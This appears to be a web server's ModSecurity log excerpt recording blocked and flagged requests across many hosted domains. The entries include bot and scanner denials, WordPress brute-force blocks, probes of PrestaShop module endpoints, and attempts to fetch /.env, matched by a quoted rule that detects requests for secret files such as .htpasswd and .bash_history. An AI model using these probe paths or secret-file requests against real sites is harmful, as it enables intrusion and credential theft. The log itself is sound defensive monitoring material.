[Tue May 26 15:29:13.006217 2026] [security2:error] [pid 715645:tid 715865] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-PgAAWjk"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:13.675071 2026] [security2:error] [pid 715645:tid 715807] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu8XVGgMGh8k213Rj-XgAAACA"]
[Tue May 26 15:29:13.831738 2026] [security2:error] [pid 715645:tid 715855] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu8XVGgMGh8k213Rj-WQAAAFA"]
[Tue May 26 15:29:13.973312 2026] [security2:error] [pid 715645:tid 715853] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu8XVGgMGh8k213Rj-cwAAAE4"]
[Tue May 26 15:29:14.616760 2026] [security2:error] [pid 715645:tid 715796] [client 74.7.175.179:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "triviewsolutions.com"] [uri "/index.php"] [unique_id "ahVu8XVGgMGh8k213Rj-ZwAAABU"]
[Tue May 26 15:29:14.617814 2026] [security2:error] [pid 715645:tid 715878] [client 74.7.175.179:39918] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "triviewsolutions.com"] [uri "/robots.txt"] [unique_id "ahVu8XVGgMGh8k213Rj-ZQAAZ18"]
[Tue May 26 15:29:14.624088 2026] [security2:error] [pid 715645:tid 715839] [client 74.7.244.19:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "triviewsolutions.com.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVu8XVGgMGh8k213Rj-cAAAAEA"]
[Tue May 26 15:29:14.625021 2026] [security2:error] [pid 715645:tid 715810] [client 74.7.244.19:56546] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "triviewsolutions.com.freshmindsolutions.com"] [uri "/robots.txt"] [unique_id "ahVu8XVGgMGh8k213Rj-bgAAI1M"]
[Tue May 26 15:29:14.865111 2026] [security2:error] [pid 715645:tid 715828] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu8nVGgMGh8k213Rj-jgAAADU"]
[Tue May 26 15:29:14.992228 2026] [security2:error] [pid 715645:tid 715869] [client 103.151.173.206:64829] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahVu8nVGgMGh8k213Rj-gQAAAFY"]
[Tue May 26 15:29:15.082311 2026] [security2:error] [pid 715645:tid 715722] [remote 74.7.241.58:53510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVu83VGgMGh8k213Rj-lQAAA0w"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/nationspioneer.com/wp-includes/Requests
[Tue May 26 15:29:15.240017 2026] [security2:error] [pid 715645:tid 715870] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu83VGgMGh8k213Rj-mAAAAF8"]
[Tue May 26 15:29:15.574210 2026] [security2:error] [pid 715645:tid 715859] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu83VGgMGh8k213Rj-ogAAAFQ"]
[Tue May 26 15:29:15.962142 2026] [security2:error] [pid 715645:tid 715834] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu83VGgMGh8k213Rj-pwAAADs"]
[Tue May 26 15:29:16.119982 2026] [security2:error] [pid 715645:tid 715849] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu9HVGgMGh8k213Rj-tAAAAEo"]
[Tue May 26 15:29:16.464972 2026] [security2:error] [pid 715645:tid 715858] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu9HVGgMGh8k213Rj-vQAAAFM"]
[Tue May 26 15:29:16.564334 2026] [security2:error] [pid 715645:tid 715861] [client 103.151.173.206:61528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/admin-dev/index.php/dashboard"] [unique_id "ahVu9HVGgMGh8k213Rj-xQAAAFY"]
[Tue May 26 15:29:16.802555 2026] [security2:error] [pid 715645:tid 715893] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu9HVGgMGh8k213Rj-zAAAAHY"]
[Tue May 26 15:29:16.917868 2026] [security2:error] [pid 715645:tid 715764] [remote 217.112.89.35:51234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVu9HVGgMGh8k213Rj-ywAASHY"]
[Tue May 26 15:29:17.032231 2026] [security2:error] [pid 715645:tid 715819] [client 114.119.144.29:39975] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/"] [unique_id "ahVu9XVGgMGh8k213Rj-0wAAACw"], referer: http://newdental.com.co/?ucci/6819796744691801l16a/cfbcbg9510c.hulloa
[Tue May 26 15:29:17.163270 2026] [security2:error] [pid 715645:tid 715862] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu9XVGgMGh8k213Rj-1gAAAFc"]
[Tue May 26 15:29:17.512155 2026] [security2:error] [pid 715645:tid 715848] [client 91.230.225.132:59703] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu9XVGgMGh8k213Rj-6QAAAEk"]
[Tue May 26 15:29:17.766574 2026] [security2:error] [pid 715645:tid 715887] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu9XVGgMGh8k213Rj-5wAAAHA"]
[Tue May 26 15:29:17.977900 2026] [security2:error] [pid 715645:tid 715890] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu9XVGgMGh8k213Rj-_AAAAHM"]
[Tue May 26 15:29:18.302471 2026] [security2:error] [pid 715645:tid 715875] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu9nVGgMGh8k213Rj_AgAAAGQ"]
[Tue May 26 15:29:18.629967 2026] [security2:error] [pid 715645:tid 715812] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu9nVGgMGh8k213Rj_EQAAACU"]
[Tue May 26 15:29:18.972491 2026] [security2:error] [pid 715645:tid 715805] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu9nVGgMGh8k213Rj_GwAAAB4"]
[Tue May 26 15:29:19.074597 2026] [security2:error] [pid 715645:tid 715786] [client 176.65.139.229:58734] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "aeromodellingconsultants.com"] [uri "/.env"] [unique_id "ahVu93VGgMGh8k213Rj_KAAAAAs"]
[Tue May 26 15:29:19.232644 2026] [security2:error] [pid 715645:tid 715862] [client 176.65.139.234:29976] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.aeromodellingconsultants.glorodavionics.com"] [uri "/.env"] [unique_id "ahVu93VGgMGh8k213Rj_MQAAAFc"]
[Tue May 26 15:29:19.302815 2026] [security2:error] [pid 715645:tid 715787] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu93VGgMGh8k213Rj_LwAAAAw"]
[Tue May 26 15:29:19.692034 2026] [security2:error] [pid 715645:tid 715789] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu93VGgMGh8k213Rj_PQAAAA4"]
[Tue May 26 15:29:20.024938 2026] [security2:error] [pid 715645:tid 715900] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu93VGgMGh8k213Rj_SgAAAH0"]
[Tue May 26 15:29:20.456429 2026] [security2:error] [pid 715645:tid 715895] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu-HVGgMGh8k213Rj_VwAAAHg"]
[Tue May 26 15:29:20.557717 2026] [security2:error] [pid 715645:tid 715871] [client 103.151.173.206:10834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahVu93VGgMGh8k213Rj_SwAAAFk"]
[Tue May 26 15:29:20.703263 2026] [security2:error] [pid 715645:tid 715785] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu-HVGgMGh8k213Rj_VAAAAAo"]
[Tue May 26 15:29:20.781715 2026] [security2:error] [pid 715645:tid 715896] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu-HVGgMGh8k213Rj_ZgAAAHk"]
[Tue May 26 15:29:21.135917 2026] [security2:error] [pid 715645:tid 715806] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu-XVGgMGh8k213Rj_bwAAAB8"]
[Tue May 26 15:29:21.588685 2026] [security2:error] [pid 715645:tid 715867] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu-XVGgMGh8k213Rj_eAAAAFw"]
[Tue May 26 15:29:22.400256 2026] [security2:error] [pid 715645:tid 715796] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu-nVGgMGh8k213Rj_mgAAABU"]
[Tue May 26 15:29:22.579971 2026] [security2:error] [pid 715645:tid 715843] [client 193.37.33.123:30827] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 123.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahVu-nVGgMGh8k213Rj_nAAAAEQ"]
[Tue May 26 15:29:22.747415 2026] [security2:error] [pid 715645:tid 715838] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu-nVGgMGh8k213Rj_rAAAAD8"]
[Tue May 26 15:29:23.062377 2026] [security2:error] [pid 715645:tid 715809] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu-nVGgMGh8k213Rj_wAAAACI"]
[Tue May 26 15:29:23.186492 2026] [security2:error] [pid 715645:tid 715807] [client 103.151.173.206:33529] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/admin-dev/index.php"] [unique_id "ahVu-3VGgMGh8k213Rj_ygAAACA"]
[Tue May 26 15:29:23.301654 2026] [security2:error] [pid 715645:tid 715834] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu-nVGgMGh8k213Rj_tAAAADs"]
[Tue May 26 15:29:23.999864 2026] [security2:error] [pid 715645:tid 715850] [client 103.151.173.206:61566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/envoimoinscher/ajax.php"] [unique_id "ahVu-3VGgMGh8k213Rj_5gAAAEs"]
[Tue May 26 15:29:24.027710 2026] [security2:error] [pid 715645:tid 715864] [client 103.151.173.206:61570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/payplug/ajax.php"] [unique_id "ahVu_HVGgMGh8k213Rj_5wAAAFk"]
[Tue May 26 15:29:24.032335 2026] [security2:error] [pid 715645:tid 715784] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu-3VGgMGh8k213Rj_5QAAAAk"]
[Tue May 26 15:29:24.037857 2026] [security2:error] [pid 715645:tid 715796] [client 103.151.173.206:61576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/ps_checkout/express_checkout.php"] [unique_id "ahVu_HVGgMGh8k213Rj_6AAAABU"]
[Tue May 26 15:29:24.051096 2026] [security2:error] [pid 715645:tid 715873] [client 103.151.173.206:61594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/boxtalconnect/ajax.php"] [unique_id "ahVu_HVGgMGh8k213Rj_6QAAAGI"]
[Tue May 26 15:29:24.060447 2026] [security2:error] [pid 715645:tid 715799] [client 103.151.173.206:61586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/boxtal/ajax.php"] [unique_id "ahVu_HVGgMGh8k213Rj_6gAAABg"]
[Tue May 26 15:29:24.065087 2026] [security2:error] [pid 715645:tid 715781] [client 103.151.173.206:61610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/adobe_stock/ajax.php"] [unique_id "ahVu_HVGgMGh8k213Rj_6wAAAAY"]
[Tue May 26 15:29:24.573323 2026] [security2:error] [pid 715645:tid 715846] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu_HVGgMGh8k213Rj_9wAAAEc"]
[Tue May 26 15:29:24.889212 2026] [security2:error] [pid 715645:tid 715847] [client 114.119.129.92:28263] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVu_HVGgMGh8k213RgABQAAAEg"], referer: http://haddingtonwines.com/cart?remove_item=e2f374c3418c50bc30d67d5f7454a5b4
[Tue May 26 15:29:24.950541 2026] [security2:error] [pid 715645:tid 715884] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu_HVGgMGh8k213RgABAAAAG0"]
[Tue May 26 15:29:24.968199 2026] [security2:error] [pid 715645:tid 715807] [client 103.151.173.206:61613] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/payplug/payplug.php"] [unique_id "ahVu_HVGgMGh8k213RgACQAAACA"]
[Tue May 26 15:29:24.989078 2026] [security2:error] [pid 715645:tid 715841] [client 103.151.173.206:61615] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/envoimoinscher/envoimoinscher.php"] [unique_id "ahVu_HVGgMGh8k213RgACgAAAEI"]
[Tue May 26 15:29:25.045302 2026] [security2:error] [pid 715645:tid 715894] [client 103.151.173.206:61639] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/pkfacebook/facebookConnect.php"] [unique_id "ahVu_XVGgMGh8k213RgADQAAAHc"]
[Tue May 26 15:29:25.061810 2026] [security2:error] [pid 715645:tid 715790] [client 103.151.173.206:61625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/ps_checkout/ps_checkout.php"] [unique_id "ahVu_XVGgMGh8k213RgADwAAAA8"]
[Tue May 26 15:29:25.226712 2026] [security2:error] [pid 715645:tid 715890] [client 91.230.225.116:39809] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu_XVGgMGh8k213RgAFgAAAHM"]
[Tue May 26 15:29:25.483007 2026] [security2:error] [pid 715645:tid 715656] [remote 74.7.241.58:36688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVu_XVGgMGh8k213RgAHgAABwo"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/nationspioneer.com/wp-includes/Requests
[Tue May 26 15:29:25.539717 2026] [security2:error] [pid 715645:tid 715785] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu_XVGgMGh8k213RgAHQAAAAo"]
[Tue May 26 15:29:25.546379 2026] [security2:error] [pid 715645:tid 715902] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu_XVGgMGh8k213RgAFAAAAH8"]
[Tue May 26 15:29:25.588943 2026] [security2:error] [pid 715645:tid 715843] [client 103.151.173.206:59348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/adobe_stock/adobe_stock.php"] [unique_id "ahVu_XVGgMGh8k213RgAHwAAAEQ"]
[Tue May 26 15:29:25.764043 2026] [security2:error] [pid 715645:tid 715857] [client 103.151.173.206:59344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/boxtal/boxtal.php"] [unique_id "ahVu_XVGgMGh8k213RgAKQAAAFI"]
